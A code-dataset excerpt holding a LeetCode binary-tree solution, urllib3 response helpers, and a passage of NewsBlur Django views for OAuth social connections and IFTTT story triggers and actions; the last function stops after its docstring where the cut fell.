code stringlengths 3 1.05M | repo_name stringlengths 5 104 | path stringlengths 4 251 | language stringclasses 1 value | license stringclasses 15 values | size int64 3 1.05M |
|---|---|---|---|---|---|
#Given a binary tree containing digits from 0-9 only, each root-to-leaf path could represent a number.
#
#An example is the root-to-leaf path 1->2->3 which represents the number 123.
#
#Find the total sum of all root-to-leaf numbers.
#
#For example,
#
# 1
# / \
# 2 3
#The root-to-leaf path 1->2 represents the number 12.
#The root-to-leaf path 1->3 represents the number 13.
#
#Return the sum = 12 + 13 = 25.
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
    def sumNumbers(self, root):
        """Sum every root-to-leaf number in a binary tree of digits.

        :type root: TreeNode
        :rtype: int
        """
        # Iterative DFS: each stack entry pairs a node with the number
        # formed by the digits along the root-to-node path.
        total = 0
        stack = [(root, root.val)] if root else []
        while stack:
            node, number = stack.pop()
            if node.left:
                stack.append((node.left, number * 10 + node.left.val))
            if node.right:
                stack.append((node.right, number * 10 + node.right.val))
            elif not node.left:
                # Leaf reached: the accumulated number is complete.
                total += number
        return total
| 95subodh/Leetcode | 129. Sum Root to Leaf Numbers.py | Python | mit | 960 |
from __future__ import absolute_import
from ..packages.six.moves import http_client as httplib
from ..exceptions import HeaderParsingError
def is_fp_closed(obj):
    """
    Checks whether a given file-like object is closed.
    :param obj:
        The file-like object to check.
    """
    # Probe each known "closed" indicator in order of preference, falling
    # through to the next one on AttributeError.
    probes = (
        # `isclosed()` first, in case Python3 doesn't set `closed` (GH #928).
        lambda fp: fp.isclosed(),
        # The official file-like-object attribute.
        lambda fp: fp.closed,
        # Containers for another file-like object that gets released on
        # exhaustion (e.g. HTTPResponse) null out `fp`.
        lambda fp: fp.fp is None,
    )
    for probe in probes:
        try:
            return probe(obj)
        except AttributeError:
            continue
    raise ValueError("Unable to determine whether fp is closed.")
def assert_header_parsing(headers):
    """
    Asserts whether all headers have been successfully parsed.
    Extracts encountered errors from the result of parsing headers.
    Only works on Python 3.
    :param headers: Headers to verify.
    :type headers: `httplib.HTTPMessage`.
    :raises urllib3.exceptions.HeaderParsingError:
        If parsing errors are found.
    """
    # This will fail silently if we pass in the wrong kind of parameter.
    # To make debugging easier add an explicit check.
    if not isinstance(headers, httplib.HTTPMessage):
        raise TypeError("expected httplib.Message, got {0}.".format(type(headers)))
    defects = getattr(headers, "defects", None)
    get_payload = getattr(headers, "get_payload", None)
    unparsed_data = None
    # get_payload is actually email.message.Message.get_payload; we're only
    # interested in the result if it's not a multipart message.
    if get_payload and not headers.is_multipart():
        payload = get_payload()
        if isinstance(payload, (bytes, str)):
            unparsed_data = payload
    if defects or unparsed_data:
        raise HeaderParsingError(defects=defects, unparsed_data=unparsed_data)
def is_response_to_head(response):
    """
    Checks whether the request of a response has been a HEAD-request.
    Handles the quirks of AppEngine.
    :param conn:
    :type conn: :class:`httplib.HTTPResponse`
    """
    # FIXME: Can we do this somehow without accessing private httplib _method?
    method = response._method
    # Platform-specific: AppEngine stores the method as an int (3 == HEAD).
    return method == 3 if isinstance(method, int) else method.upper() == "HEAD"
| RalfBarkow/Zettelkasten | venv/lib/python3.9/site-packages/pip/_vendor/urllib3/util/response.py | Python | gpl-3.0 | 2,573 |
import urllib
import datetime
import lxml.html
import tweepy
from django.contrib.auth.decorators import login_required
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User
from django.contrib.sites.models import Site
from django.http import HttpResponseForbidden, HttpResponseRedirect
from django.conf import settings
from mongoengine.queryset import NotUniqueError
from mongoengine.queryset import OperationError
from apps.social.models import MSocialServices, MSocialSubscription, MSharedStory
from apps.social.tasks import SyncTwitterFriends, SyncFacebookFriends, SyncAppdotnetFriends
from apps.reader.models import UserSubscription, UserSubscriptionFolders, RUserStory
from apps.analyzer.models import MClassifierTitle, MClassifierAuthor, MClassifierFeed, MClassifierTag
from apps.analyzer.models import compute_story_score
from apps.rss_feeds.models import Feed, MStory, MStarredStoryCounts, MStarredStory
from apps.rss_feeds.text_importer import TextImporter
from utils import log as logging
from utils.user_functions import ajax_login_required, oauth_login_required
from utils.view_functions import render_to
from utils import urlnorm
from utils import json_functions as json
from vendor import facebook
from vendor import appdotnet
@login_required
@render_to('social/social_connect.xhtml')
def twitter_connect(request):
    """OAuth 1.0a handshake with Twitter, all phases in one view.

    - no params: starts the handshake and returns the authorization URL;
    - ``denied``: the user rejected the app on Twitter's side;
    - ``oauth_token``/``oauth_verifier``: exchanges the verifier for an
      access token and stores the credentials on MSocialServices.
    """
    twitter_consumer_key = settings.TWITTER_CONSUMER_KEY
    twitter_consumer_secret = settings.TWITTER_CONSUMER_SECRET
    oauth_token = request.REQUEST.get('oauth_token')
    oauth_verifier = request.REQUEST.get('oauth_verifier')
    denied = request.REQUEST.get('denied')
    if denied:
        logging.user(request, "~BB~FRDenied Twitter connect")
        return {'error': 'Denied! Try connecting again.'}
    elif oauth_token and oauth_verifier:
        try:
            auth = tweepy.OAuthHandler(twitter_consumer_key, twitter_consumer_secret)
            # Resume the handshake started below using the request token
            # stashed in the session at the start of the dance.
            auth.request_token = request.session['twitter_request_token']
            # auth.set_request_token(oauth_token, oauth_verifier)
            auth.get_access_token(oauth_verifier)
            api = tweepy.API(auth)
            twitter_user = api.me()
        except (tweepy.TweepError, IOError), e:
            logging.user(request, "~BB~FRFailed Twitter connect: %s" % e)
            return dict(error="Twitter has returned an error. Try connecting again.")
        # Be sure that two people aren't using the same Twitter account.
        existing_user = MSocialServices.objects.filter(twitter_uid=unicode(twitter_user.id))
        if existing_user and existing_user[0].user_id != request.user.pk:
            try:
                user = User.objects.get(pk=existing_user[0].user_id)
                logging.user(request, "~BB~FRFailed Twitter connect, another user: %s" % user.username)
                return dict(error=("Another user (%s, %s) has "
                                   "already connected with those Twitter credentials."
                                   % (user.username, user.email or "no email")))
            except User.DoesNotExist:
                # Stale service record pointing at a deleted user; reclaim it.
                existing_user.delete()
        social_services = MSocialServices.get_user(request.user.pk)
        social_services.twitter_uid = unicode(twitter_user.id)
        social_services.twitter_access_key = auth.access_token
        social_services.twitter_access_secret = auth.access_token_secret
        social_services.syncing_twitter = True
        social_services.save()
        # Friend sync happens out-of-band in a celery task.
        SyncTwitterFriends.delay(user_id=request.user.pk)
        logging.user(request, "~BB~FRFinishing Twitter connect")
        return {}
    else:
        # Start the OAuth process
        auth = tweepy.OAuthHandler(twitter_consumer_key, twitter_consumer_secret)
        auth_url = auth.get_authorization_url()
        request.session['twitter_request_token'] = auth.request_token
        logging.user(request, "~BB~FRStarting Twitter connect: %s" % auth.request_token)
        return {'next': auth_url}
@login_required
@render_to('social/social_connect.xhtml')
def facebook_connect(request):
    """OAuth2 handshake with Facebook.

    The first request returns the URL of Facebook's auth dialog; the
    callback (carrying ``code``) exchanges it for an access token and
    stores the credentials on MSocialServices.
    """
    facebook_app_id = settings.FACEBOOK_APP_ID
    facebook_secret = settings.FACEBOOK_SECRET
    args = {
        "client_id": facebook_app_id,
        "redirect_uri": "http://" + Site.objects.get_current().domain + reverse('facebook-connect'),
        "scope": "user_friends",
        "display": "popup",
    }
    verification_code = request.REQUEST.get('code')
    if verification_code:
        args["client_secret"] = facebook_secret
        args["code"] = verification_code
        uri = "https://graph.facebook.com/oauth/access_token?" + \
              urllib.urlencode(args)
        response_text = urllib.urlopen(uri).read()
        response = json.decode(response_text)
        if "access_token" not in response:
            logging.user(request, "~BB~FRFailed Facebook connect, no access_token. (%s): %s" % (args, response))
            return dict(error="Facebook has returned an error. Try connecting again.")
        access_token = response["access_token"]
        # Get the user's profile.
        graph = facebook.GraphAPI(access_token)
        profile = graph.get_object("me")
        uid = profile["id"]
        # Be sure that two people aren't using the same Facebook account.
        existing_user = MSocialServices.objects.filter(facebook_uid=uid)
        if existing_user and existing_user[0].user_id != request.user.pk:
            try:
                user = User.objects.get(pk=existing_user[0].user_id)
                logging.user(request, "~BB~FRFailed FB connect, another user: %s" % user.username)
                return dict(error=("Another user (%s, %s) has "
                                   "already connected with those Facebook credentials."
                                   % (user.username, user.email or "no email")))
            except User.DoesNotExist:
                # Stale service record pointing at a deleted user; reclaim it.
                existing_user.delete()
        social_services = MSocialServices.get_user(request.user.pk)
        social_services.facebook_uid = uid
        social_services.facebook_access_token = access_token
        social_services.syncing_facebook = True
        social_services.save()
        # Friend sync runs asynchronously in a celery task.
        SyncFacebookFriends.delay(user_id=request.user.pk)
        logging.user(request, "~BB~FRFinishing Facebook connect")
        return {}
    elif request.REQUEST.get('error'):
        logging.user(request, "~BB~FRFailed Facebook connect, error: %s" % request.REQUEST.get('error'))
        return {'error': '%s... Try connecting again.' % request.REQUEST.get('error')}
    else:
        # Start the OAuth process
        logging.user(request, "~BB~FRStarting Facebook connect")
        url = "https://www.facebook.com/dialog/oauth?" + urllib.urlencode(args)
        return {'next': url}
@login_required
@render_to('social/social_connect.xhtml')
def appdotnet_connect(request):
    """OAuth2 handshake with App.net, mirroring facebook_connect."""
    domain = Site.objects.get_current().domain
    args = {
        "client_id": settings.APPDOTNET_CLIENTID,
        "client_secret": settings.APPDOTNET_SECRET,
        "redirect_uri": "http://" + domain +
                        reverse('appdotnet-connect'),
        "scope": ["email", "write_post", "follow"],
    }
    oauth_code = request.REQUEST.get('code')
    denied = request.REQUEST.get('denied')
    if denied:
        logging.user(request, "~BB~FRDenied App.net connect")
        return {'error': 'Denied! Try connecting again.'}
    elif oauth_code:
        try:
            adn_auth = appdotnet.Appdotnet(**args)
            response = adn_auth.getAuthResponse(oauth_code)
            adn_resp = json.decode(response)
            access_token = adn_resp['access_token']
            adn_userid = adn_resp['user_id']
        except (IOError):
            logging.user(request, "~BB~FRFailed App.net connect")
            return dict(error="App.net has returned an error. Try connecting again.")
        # Be sure that two people aren't using the same App.net account.
        existing_user = MSocialServices.objects.filter(appdotnet_uid=unicode(adn_userid))
        if existing_user and existing_user[0].user_id != request.user.pk:
            try:
                user = User.objects.get(pk=existing_user[0].user_id)
                logging.user(request, "~BB~FRFailed App.net connect, another user: %s" % user.username)
                return dict(error=("Another user (%s, %s) has "
                                   "already connected with those App.net credentials."
                                   % (user.username, user.email or "no email")))
            except User.DoesNotExist:
                # Stale service record pointing at a deleted user; reclaim it.
                existing_user.delete()
        social_services = MSocialServices.get_user(request.user.pk)
        social_services.appdotnet_uid = unicode(adn_userid)
        social_services.appdotnet_access_token = access_token
        social_services.syncing_appdotnet = True
        social_services.save()
        # Friend sync runs asynchronously in a celery task.
        SyncAppdotnetFriends.delay(user_id=request.user.pk)
        logging.user(request, "~BB~FRFinishing App.net connect")
        return {}
    else:
        # Start the OAuth process
        adn_auth = appdotnet.Appdotnet(**args)
        auth_url = adn_auth.generateAuthUrl()
        logging.user(request, "~BB~FRStarting App.net connect")
        return {'next': auth_url}
@ajax_login_required
def twitter_disconnect(request):
    """Drop the stored Twitter credentials for the current user."""
    logging.user(request, "~BB~FRDisconnecting Twitter")
    services = MSocialServices.objects.get(user_id=request.user.pk)
    services.disconnect_twitter()
    # Send the client back to the friends list so it reflects the change.
    return HttpResponseRedirect(reverse('load-user-friends'))
@ajax_login_required
def facebook_disconnect(request):
    """Drop the stored Facebook credentials for the current user."""
    logging.user(request, "~BB~FRDisconnecting Facebook")
    services = MSocialServices.objects.get(user_id=request.user.pk)
    services.disconnect_facebook()
    # Send the client back to the friends list so it reflects the change.
    return HttpResponseRedirect(reverse('load-user-friends'))
@ajax_login_required
def appdotnet_disconnect(request):
    """Drop the stored App.net credentials for the current user."""
    logging.user(request, "~BB~FRDisconnecting App.net")
    services = MSocialServices.objects.get(user_id=request.user.pk)
    services.disconnect_appdotnet()
    # Send the client back to the friends list so it reflects the change.
    return HttpResponseRedirect(reverse('load-user-friends'))
@ajax_login_required
@json.json_view
def follow_twitter_account(request):
    """Follow one of the official NewsBlur Twitter accounts on the
    user's behalf; any other username is rejected with a 403."""
    username = request.POST['username']
    code = 1
    message = "OK"
    logging.user(request, "~BB~FR~SKFollowing Twitter: %s" % username)
    # Only the official accounts may be followed through this endpoint.
    if username not in ['samuelclay', 'newsblur']:
        return HttpResponseForbidden()
    social_services = MSocialServices.objects.get(user_id=request.user.pk)
    try:
        api = social_services.twitter_api()
        api.create_friendship(username)
    except tweepy.TweepError, e:
        # Report the Twitter failure to the client instead of raising.
        code = -1
        message = e
    return {'code': code, 'message': message}
@ajax_login_required
@json.json_view
def unfollow_twitter_account(request):
    """Unfollow one of the official NewsBlur Twitter accounts on the
    user's behalf; any other username is rejected with a 403."""
    username = request.POST['username']
    code = 1
    message = "OK"
    logging.user(request, "~BB~FRUnfollowing Twitter: %s" % username)
    # Only the official accounts may be unfollowed through this endpoint.
    if username not in ['samuelclay', 'newsblur']:
        return HttpResponseForbidden()
    social_services = MSocialServices.objects.get(user_id=request.user.pk)
    try:
        api = social_services.twitter_api()
        api.destroy_friendship(username)
    except tweepy.TweepError, e:
        # Report the Twitter failure to the client instead of raising.
        code = -1
        message = e
    return {'code': code, 'message': message}
@oauth_login_required
def api_user_info(request):
    """Return the authenticated user's name and id (IFTTT user-info API)."""
    profile = {
        "name": request.user.username,
        "id": request.user.pk,
    }
    return json.json_response(request, {"data": profile})
@oauth_login_required
@json.json_view
def api_feed_list(request, trigger_slug=None):
    """List the user's folders and feeds as IFTTT dropdown options.

    Each folder becomes an optgroup row, followed by that folder's active
    feeds sorted case-insensitively by title.
    """
    user = request.user
    try:
        usf = UserSubscriptionFolders.objects.get(user=user)
    except UserSubscriptionFolders.DoesNotExist:
        return {"errors": [{
            'message': 'Could not find feeds for user.'
        }]}
    flat_folders = usf.flatten_folders()
    titles = [dict(label=" - Folder: All Site Stories", value="all")]
    feeds = {}
    user_subs = UserSubscription.objects.select_related('feed').filter(user=user, active=True)
    for sub in user_subs:
        feeds[sub.feed_id] = sub.canonical()
    for folder_title in sorted(flat_folders.keys()):
        if folder_title and folder_title != " ":
            titles.append(dict(label=" - Folder: %s" % folder_title, value=folder_title, optgroup=True))
        else:
            # " " is the internal name for the top-level pseudo-folder.
            titles.append(dict(label=" - Folder: Top Level", value="Top Level", optgroup=True))
        folder_contents = []
        for feed_id in flat_folders[folder_title]:
            # Skip feeds without an active subscription.
            if feed_id not in feeds: continue
            feed = feeds[feed_id]
            folder_contents.append(dict(label=feed['feed_title'], value=str(feed['id'])))
        folder_contents = sorted(folder_contents, key=lambda f: f['label'].lower())
        titles.extend(folder_contents)
    return {"data": titles}
@oauth_login_required
@json.json_view
def api_folder_list(request, trigger_slug=None):
    """List the user's folders as label/value pairs for IFTTT dropdowns."""
    folders = UserSubscriptionFolders.objects.get(user=request.user)
    flat = folders.flatten_folders()
    # The add-new-subscription action has no "all" catch-all entry.
    if 'add-new-subscription' in request.path:
        entries = []
    else:
        entries = [dict(label="All Site Stories", value="all")]
    for title in sorted(flat.keys()):
        # " " is the internal name for the top-level pseudo-folder.
        display = title if title and title != " " else "Top Level"
        entries.append(dict(label=display, value=display))
    return {"data": entries}
@oauth_login_required
@json.json_view
def api_saved_tag_list(request):
    """List saved-story tags (with counts) for IFTTT trigger fields."""
    starred_counts, starred_count = MStarredStoryCounts.user_counts(request.user.pk, include_total=True)
    tags = []
    for tag in starred_counts:
        name = tag['tag']
        if not name or name == "":
            continue
        noun = 'story' if tag['count'] == 1 else 'stories'
        tags.append(dict(label="%s (%s %s)" % (name, tag['count'], noun),
                         value=name))
    tags.sort(key=lambda t: t['value'].lower())
    # Prepend the catch-all entry covering every saved story.
    noun = 'story' if starred_count == 1 else 'stories'
    tags.insert(0, dict(label="All Saved Stories (%s %s)" % (starred_count, noun),
                        value="all"))
    return {"data": tags}
@oauth_login_required
@json.json_view
def api_shared_usernames(request):
    """List followed blurblogs that have at least one shared story."""
    social_feeds = MSocialSubscription.feeds(user_id=request.user.pk)
    blurblogs = []
    for feed in social_feeds:
        count = feed['shared_stories_count']
        if not count:
            continue
        noun = 'story' if count == 1 else 'stories'
        blurblogs.append(dict(label="%s (%s %s)" % (feed['username'], count, noun),
                              value="%s" % feed['user_id']))
    blurblogs.sort(key=lambda b: b['label'].lower())
    # Prepend the catch-all entry covering every followed blurblog.
    blurblogs.insert(0, dict(label="All Shared Stories", value="all"))
    return {"data": blurblogs}
@oauth_login_required
@json.json_view
def api_unread_story(request, trigger_slug=None):
    """IFTTT trigger: return recent unread stories for a feed or folder.

    ``triggerFields['feed_or_folder']`` is either a numeric feed id or a
    folder title ("all" means every folder). Stories that score below 0
    against the user's classifiers are dropped; the
    "new-unread-focus-story" trigger additionally requires score >= 1.
    """
    user = request.user
    body = request.body_json
    after = body.get('after', None)
    before = body.get('before', None)
    limit = body.get('limit', 50)
    fields = body.get('triggerFields')
    feed_or_folder = fields['feed_or_folder']
    entries = []
    if isinstance(feed_or_folder, int) or feed_or_folder.isdigit():
        # Single-feed trigger.
        feed_id = int(feed_or_folder)
        try:
            usersub = UserSubscription.objects.get(user=user, feed_id=feed_id)
        except UserSubscription.DoesNotExist:
            return dict(data=[])
        found_feed_ids = [feed_id]
        found_trained_feed_ids = [feed_id] if usersub.is_trained else []
        stories = usersub.get_stories(order="newest", read_filter="unread",
                                      offset=0, limit=limit,
                                      default_cutoff_date=user.profile.unread_cutoff)
    else:
        # Folder trigger (or "all" folders).
        folder_title = feed_or_folder
        if folder_title == "Top Level":
            # " " is the internal name for the top-level pseudo-folder.
            folder_title = " "
        usf = UserSubscriptionFolders.objects.get(user=user)
        flat_folders = usf.flatten_folders()
        feed_ids = None
        if folder_title != "all":
            feed_ids = flat_folders.get(folder_title)
        usersubs = UserSubscription.subs_for_feeds(user.pk, feed_ids=feed_ids,
                                                   read_filter="unread")
        feed_ids = [sub.feed_id for sub in usersubs]
        params = {
            "user_id": user.pk,
            "feed_ids": feed_ids,
            "offset": 0,
            "limit": limit,
            "order": "newest",
            "read_filter": "unread",
            "usersubs": usersubs,
            "cutoff_date": user.profile.unread_cutoff,
        }
        story_hashes, unread_feed_story_hashes = UserSubscription.feed_stories(**params)
        mstories = MStory.objects(story_hash__in=story_hashes).order_by('-story_date')
        stories = Feed.format_stories(mstories)
        found_feed_ids = list(set([story['story_feed_id'] for story in stories]))
        trained_feed_ids = [sub.feed_id for sub in usersubs if sub.is_trained]
        found_trained_feed_ids = list(set(trained_feed_ids) & set(found_feed_ids))
    if found_trained_feed_ids:
        # Load the user's classifiers only for feeds that are trained.
        classifier_feeds = list(MClassifierFeed.objects(user_id=user.pk,
                                                        feed_id__in=found_trained_feed_ids))
        classifier_authors = list(MClassifierAuthor.objects(user_id=user.pk,
                                                            feed_id__in=found_trained_feed_ids))
        classifier_titles = list(MClassifierTitle.objects(user_id=user.pk,
                                                          feed_id__in=found_trained_feed_ids))
        classifier_tags = list(MClassifierTag.objects(user_id=user.pk,
                                                      feed_id__in=found_trained_feed_ids))
    feeds = dict([(f.pk, {
        "title": f.feed_title,
        "website": f.feed_link,
        "address": f.feed_address,
    }) for f in Feed.objects.filter(pk__in=found_feed_ids)])
    for story in stories:
        # Time-window filtering compares epoch seconds of the story date.
        if before and int(story['story_date'].strftime("%s")) > before: continue
        if after and int(story['story_date'].strftime("%s")) < after: continue
        score = 0
        if found_trained_feed_ids and story['story_feed_id'] in found_trained_feed_ids:
            score = compute_story_score(story, classifier_titles=classifier_titles,
                                        classifier_authors=classifier_authors,
                                        classifier_tags=classifier_tags,
                                        classifier_feeds=classifier_feeds)
        if score < 0: continue
        if trigger_slug == "new-unread-focus-story" and score < 1: continue
        feed = feeds.get(story['story_feed_id'], None)
        entries.append({
            "StoryTitle": story['story_title'],
            "StoryContent": story['story_content'],
            "StoryURL": story['story_permalink'],
            "StoryAuthor": story['story_authors'],
            "PublishedAt": story['story_date'].strftime("%Y-%m-%dT%H:%M:%SZ"),
            "StoryScore": score,
            "Site": feed and feed['title'],
            "SiteURL": feed and feed['website'],
            "SiteRSS": feed and feed['address'],
            "meta": {
                "id": story['story_hash'],
                "timestamp": int(story['story_date'].strftime("%s"))
            },
        })
    if after:
        # When paging forward, IFTTT expects oldest-first ordering.
        entries = sorted(entries, key=lambda s: s['meta']['timestamp'])
    logging.user(request, "~FYChecking unread%s stories with ~SB~FCIFTTT~SN~FY: ~SB%s~SN - ~SB%s~SN stories" % (" ~SBfocus~SN" if trigger_slug == "new-unread-focus-story" else "", feed_or_folder, len(entries)))
    return {"data": entries[:limit]}
@oauth_login_required
@json.json_view
def api_saved_story(request):
    """IFTTT trigger: return the user's recently saved (starred) stories,
    optionally filtered by a single user tag ("all" means no filter)."""
    user = request.user
    body = request.body_json
    after = body.get('after', None)
    before = body.get('before', None)
    limit = body.get('limit', 50)
    fields = body.get('triggerFields')
    story_tag = fields['story_tag']
    entries = []
    if story_tag == "all":
        story_tag = ""
    params = dict(user_id=user.pk)
    if story_tag:
        params.update(dict(user_tags__contains=story_tag))
    mstories = MStarredStory.objects(**params).order_by('-starred_date')[:limit]
    stories = Feed.format_stories(mstories)
    found_feed_ids = list(set([story['story_feed_id'] for story in stories]))
    feeds = dict([(f.pk, {
        "title": f.feed_title,
        "website": f.feed_link,
        "address": f.feed_address,
    }) for f in Feed.objects.filter(pk__in=found_feed_ids)])
    for story in stories:
        # Time-window filtering compares epoch seconds of the story date.
        if before and int(story['story_date'].strftime("%s")) > before: continue
        if after and int(story['story_date'].strftime("%s")) < after: continue
        feed = feeds.get(story['story_feed_id'], None)
        entries.append({
            "StoryTitle": story['story_title'],
            "StoryContent": story['story_content'],
            "StoryURL": story['story_permalink'],
            "StoryAuthor": story['story_authors'],
            "PublishedAt": story['story_date'].strftime("%Y-%m-%dT%H:%M:%SZ"),
            "SavedAt": story['starred_date'].strftime("%Y-%m-%dT%H:%M:%SZ"),
            "Tags": ', '.join(story['user_tags']),
            "Site": feed and feed['title'],
            "SiteURL": feed and feed['website'],
            "SiteRSS": feed and feed['address'],
            "meta": {
                "id": story['story_hash'],
                "timestamp": int(story['starred_date'].strftime("%s"))
            },
        })
    if after:
        # When paging forward, IFTTT expects oldest-first ordering.
        entries = sorted(entries, key=lambda s: s['meta']['timestamp'])
    logging.user(request, "~FCChecking saved stories from ~SBIFTTT~SB: ~SB%s~SN - ~SB%s~SN stories" % (story_tag if story_tag else "[All stories]", len(entries)))
    return {"data": entries}
@oauth_login_required
@json.json_view
def api_shared_story(request):
    """IFTTT trigger: return stories shared on followed blurblogs.

    ``triggerFields['blurblog_user']`` is a numeric user id or "all" for
    every followed blurblog. Stories scoring below 0 against the user's
    classifiers (social plus per-feed) are dropped.
    """
    user = request.user
    body = request.body_json
    after = body.get('after', None)
    before = body.get('before', None)
    limit = body.get('limit', 50)
    fields = body.get('triggerFields')
    blurblog_user = fields['blurblog_user']
    entries = []
    if isinstance(blurblog_user, int) or blurblog_user.isdigit():
        social_user_ids = [int(blurblog_user)]
    elif blurblog_user == "all":
        socialsubs = MSocialSubscription.objects.filter(user_id=user.pk)
        social_user_ids = [ss.subscription_user_id for ss in socialsubs]
    # NOTE(review): any other blurblog_user value leaves social_user_ids
    # unbound and raises NameError below -- confirm IFTTT never sends one.
    mstories = MSharedStory.objects(
        user_id__in=social_user_ids
    ).order_by('-shared_date')[:limit]
    stories = Feed.format_stories(mstories)
    found_feed_ids = list(set([story['story_feed_id'] for story in stories]))
    share_user_ids = list(set([story['user_id'] for story in stories]))
    users = dict([(u.pk, u.username)
                 for u in User.objects.filter(pk__in=share_user_ids).only('pk', 'username')])
    feeds = dict([(f.pk, {
        "title": f.feed_title,
        "website": f.feed_link,
        "address": f.feed_address,
    }) for f in Feed.objects.filter(pk__in=found_feed_ids)])
    # Social (per-blurblog) classifiers...
    classifier_feeds = list(MClassifierFeed.objects(user_id=user.pk,
                                                    social_user_id__in=social_user_ids))
    classifier_authors = list(MClassifierAuthor.objects(user_id=user.pk,
                                                        social_user_id__in=social_user_ids))
    classifier_titles = list(MClassifierTitle.objects(user_id=user.pk,
                                                      social_user_id__in=social_user_ids))
    classifier_tags = list(MClassifierTag.objects(user_id=user.pk,
                                                  social_user_id__in=social_user_ids))
    # Merge with feed specific classifiers
    classifier_feeds = classifier_feeds + list(MClassifierFeed.objects(user_id=user.pk,
                                                                       feed_id__in=found_feed_ids))
    classifier_authors = classifier_authors + list(MClassifierAuthor.objects(user_id=user.pk,
                                                                             feed_id__in=found_feed_ids))
    classifier_titles = classifier_titles + list(MClassifierTitle.objects(user_id=user.pk,
                                                                          feed_id__in=found_feed_ids))
    classifier_tags = classifier_tags + list(MClassifierTag.objects(user_id=user.pk,
                                                                    feed_id__in=found_feed_ids))
    for story in stories:
        # Time-window filtering compares epoch seconds of the share date.
        if before and int(story['shared_date'].strftime("%s")) > before: continue
        if after and int(story['shared_date'].strftime("%s")) < after: continue
        score = compute_story_score(story, classifier_titles=classifier_titles,
                                    classifier_authors=classifier_authors,
                                    classifier_tags=classifier_tags,
                                    classifier_feeds=classifier_feeds)
        if score < 0: continue
        feed = feeds.get(story['story_feed_id'], None)
        entries.append({
            "StoryTitle": story['story_title'],
            "StoryContent": story['story_content'],
            "StoryURL": story['story_permalink'],
            "StoryAuthor": story['story_authors'],
            "PublishedAt": story['story_date'].strftime("%Y-%m-%dT%H:%M:%SZ"),
            "StoryScore": score,
            "Comments": story['comments'],
            "Username": users.get(story['user_id']),
            "SharedAt": story['shared_date'].strftime("%Y-%m-%dT%H:%M:%SZ"),
            "Site": feed and feed['title'],
            "SiteURL": feed and feed['website'],
            "SiteRSS": feed and feed['address'],
            "meta": {
                "id": story['story_hash'],
                "timestamp": int(story['shared_date'].strftime("%s"))
            },
        })
    if after:
        # When paging forward, IFTTT expects oldest-first ordering.
        entries = sorted(entries, key=lambda s: s['meta']['timestamp'])
    logging.user(request, "~FMChecking shared stories from ~SB~FCIFTTT~SN~FM: ~SB~FM%s~FM~SN - ~SB%s~SN stories" % (blurblog_user, len(entries)))
    return {"data": entries}
@json.json_view
def ifttt_status(request):
    """IFTTT channel health check: report OK plus the current UTC time."""
    logging.user(request, "~FCChecking ~SBIFTTT~SN status")
    now = datetime.datetime.utcnow().strftime("%Y-%m-%dT%H:%M:%SZ")
    return {"data": {
        "status": "OK",
        "time": now,
    }}
@oauth_login_required
@json.json_view
def api_share_new_story(request):
    """IFTTT action: share a story URL to the user's blurblog.

    Enforces per-feed (free users) and per-day sharing quotas, fetches
    missing title/content via the text importer, creates the shared
    story, and marks it read for the sharer.
    """
    user = request.user
    body = request.body_json
    fields = body.get('actionFields')
    story_url = urlnorm.normalize(fields['story_url'])
    story_content = fields.get('story_content', "")
    story_title = fields.get('story_title', "")
    story_author = fields.get('story_author', "")
    comments = fields.get('comments', None)
    logging.user(request.user, "~FBFinding feed (api_share_new_story): %s" % story_url)
    original_feed = Feed.get_feed_from_url(story_url, create=True, fetch=True)
    story_hash = MStory.guid_hash_unsaved(story_url)
    feed_id = (original_feed and original_feed.pk or 0)
    # Free users are limited to one share per site per day.
    if not user.profile.is_premium and MSharedStory.feed_quota(user.pk, story_hash, feed_id=feed_id):
        return {"errors": [{
            'message': 'Only premium users can share multiple stories per day from the same site.'
        }]}
    quota = 3
    if MSharedStory.feed_quota(user.pk, story_hash, quota=quota):
        logging.user(request, "~BM~FRNOT ~FYSharing story from ~SB~FCIFTTT~FY, over quota: ~SB%s: %s" % (story_url, comments))
        return {"errors": [{
            'message': 'You can only share %s stories per day.' % quota
        }]}
    if not story_content or not story_title:
        # Fill in missing pieces by fetching the original page text.
        ti = TextImporter(feed=original_feed, story_url=story_url, request=request)
        original_story = ti.fetch(return_document=True)
        if original_story:
            story_url = original_story['url']
            if not story_content:
                story_content = original_story['content']
            if not story_title:
                story_title = original_story['title']
    if story_content:
        # Rewrite relative links in the content against the story URL.
        story_content = lxml.html.fromstring(story_content)
        story_content.make_links_absolute(story_url)
        story_content = lxml.html.tostring(story_content)
    shared_story = MSharedStory.objects.filter(user_id=user.pk,
                                               story_feed_id=original_feed and original_feed.pk or 0,
                                               story_guid=story_url).limit(1).first()
    if not shared_story:
        title_max = MSharedStory._fields['story_title'].max_length
        story_db = {
            "story_guid": story_url,
            "story_permalink": story_url,
            "story_title": story_title and story_title[:title_max] or "[Untitled]",
            "story_feed_id": original_feed and original_feed.pk or 0,
            "story_content": story_content,
            "story_author_name": story_author,
            "story_date": datetime.datetime.now(),
            "user_id": user.pk,
            "comments": comments,
            "has_comments": bool(comments),
        }
        try:
            shared_story = MSharedStory.objects.create(**story_db)
            # Followers need their unread counts recomputed.
            socialsubs = MSocialSubscription.objects.filter(subscription_user_id=user.pk)
            for socialsub in socialsubs:
                socialsub.needs_unread_recalc = True
                socialsub.save()
            logging.user(request, "~BM~FYSharing story from ~SB~FCIFTTT~FY: ~SB%s: %s" % (story_url, comments))
        except NotUniqueError:
            # Raced another share of the same story; treat as already shared.
            logging.user(request, "~BM~FY~SBAlready~SN shared story from ~SB~FCIFTTT~FY: ~SB%s: %s" % (story_url, comments))
    else:
        logging.user(request, "~BM~FY~SBAlready~SN shared story from ~SB~FCIFTTT~FY: ~SB%s: %s" % (story_url, comments))
    try:
        socialsub = MSocialSubscription.objects.get(user_id=user.pk,
                                                    subscription_user_id=user.pk)
    except MSocialSubscription.DoesNotExist:
        socialsub = None
    # Mark the story read for the sharer, via their own-blurblog
    # subscription when one exists.
    if socialsub and shared_story:
        socialsub.mark_story_ids_as_read([shared_story.story_hash],
                                         shared_story.story_feed_id,
                                         request=request)
    elif shared_story:
        RUserStory.mark_read(user.pk, shared_story.story_feed_id, shared_story.story_hash)
    if shared_story:
        shared_story.publish_update_to_subscribers()
    return {"data": [{
        "id": shared_story and shared_story.story_guid,
        "url": shared_story and shared_story.blurblog_permalink()
    }]}
@oauth_login_required
@json.json_view
def api_save_new_story(request):
    """IFTTT action: save (star) a story URL with optional user tags."""
